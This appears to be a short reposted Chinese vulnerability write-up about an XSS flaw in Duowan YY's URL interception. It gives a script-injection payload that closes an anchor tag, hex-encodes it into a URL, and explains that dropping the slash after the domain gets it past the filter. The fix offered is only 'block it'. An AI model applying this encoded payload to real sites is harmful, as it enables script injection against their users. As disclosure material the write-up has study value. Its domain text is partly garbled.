多玩YY URL拦截可致XSS攻击 - 网站安全 - 自学php

构造新代码 </a><a><script>alert('xss')</script></a> 然后16进制加密得到 http://HdhCmsTestmaopian测试数据/%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e 发出去，结果行不通删除域名后面的/,再试试，看效果吧 http://HdhCmsTestmaopian测试数据%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e 修复方案：亲，要屏蔽啊！

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13916

更新时间：2022-09-13 阅读：48次